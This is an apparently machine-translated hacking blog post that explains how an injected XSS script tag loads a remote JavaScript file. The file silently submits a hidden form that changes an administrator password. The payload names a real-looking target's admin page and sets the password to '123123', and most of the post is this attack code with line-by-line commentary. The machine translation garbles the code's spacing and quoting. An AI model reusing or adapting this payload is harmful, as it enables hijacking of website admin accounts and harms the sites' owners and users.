You can submit malicious forms without using AJAX.

Author: sswowo
During cross-site communication today, I was too lazy to write AJAX code and thought of using the FORM target attribute + iframe to simulate malicious FORM submission.
XSS code: <script language = javascript src = http://www.sswowo.com/hid e. js> </script> // The malicious injection XSS code references the JS script we write remotely.

Hide. js // the content of the hide. js script is as follows. Document. write (<iframe name = "hidden_frame" id = "hidden_frame" style = "display: none"> </iframe> <form action = "asp? Http://www.spring-design.cn/admin/Admin_modify.asp? Id = 1 "method =" post "enctype =" application/x-www-form-urlencoded "name =" xss "target =" hidden_frame "> <input type =" hidden" name = "modify" value = "yes"/> <input type = "hidden" name = "pass" value = "123123"/> <input type = "hidden" name = "pass1" value = "123123"/> </form> );

Document. forms [xss]. submit ();
Copy the code. First, we use document. write to output the code we need to use to the page. The following code explains

<Iframe name = "hidden_frame" style = "display: none"> </iframe> // a hidden IFRAME is written here. Set style = "display: none "settings are not displayed. You also need to set NAME = "hidden_frame" when the target attribute of the form is used.

<Form action = "http://www.XXXXX-XXXXXX.cn/admin/Admin_modify.asp? Id = 1 "method =" post "enctype =" application/x-www-form-urlencoded "name =" xss "target =" hidden_frame ">
// Set the submission address. Another point is that the NAME of FORM = XSS is used for automatic submission of forms using JS, the main difference is that target = "hidden_frame" is set to execute our commit action in hidden_frame. To hide the submission.
Here we set the submit action in iframe, so we will not refresh this page, the page will not be redirected to the submit address, and iframe is set to invisible. In fact, the width and height of commonly used Trojans are the same.
<Input type = "hidden" name = "modify" value = "yes"/> // construct the submit parameter and value
<Input type = "hidden" name = "pass" value = "123123"/> // construct the submit parameter and value
<Input type = "hidden" name = "pass1" value = "123123"/> // construct the submit parameter and value
</Form>

The above form is used to submit a password modification form.

Last
Document. forms [xss]. submit (); submit the form with NAME = "XSS.

In fact, we can't talk about originality, but we just come up with another small road...